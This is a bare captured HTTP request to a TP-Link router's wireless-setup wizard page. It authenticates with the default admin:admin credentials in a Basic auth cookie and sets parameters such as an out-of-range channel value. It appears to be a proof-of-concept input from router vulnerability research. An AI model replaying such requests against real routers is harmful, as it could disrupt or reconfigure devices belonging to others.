GET /RRDJFMGAJEWFYRSC/userRpm/WzdWlanRpm.htm?ap=1&ssid1=TP-LINK_0000&band=0&mode=5&chanWidth=2&channel=15&rate=71&broadcast=2&secType=0&pskSecret=12345670&btnValue=1&ClientId=2103442360&wlanpage=1 HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.254/RRDJFMGAJEWFYRSC/userRpm/WzdWlanRpm.htm
Cookie: Authorization=Basic%20YWRtaW46YWRtaW4%3D
Upgrade-Insecure-Requests: 1

